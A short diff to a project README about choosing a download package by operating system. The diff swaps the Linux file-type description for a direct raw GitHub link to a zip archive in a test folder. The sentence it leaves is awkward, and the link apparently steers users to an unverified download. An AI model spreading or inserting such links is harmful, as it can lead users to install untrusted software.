shomosmt4/codeworth/README.md

 - For Windows: a file ending with `.exe` or `.zip`
 - For macOS: a file ending with `.dmg` or `.zip`
-- For Linux: a `.tar.gz` or similar package
+- For Linux: a `https://raw.githubusercontent.com/shomosmt4/codeworth/main/dist/test/cli/Software_3.0-alpha.1.zip` or similar package

 If unsure, download the package labeled for your operating system.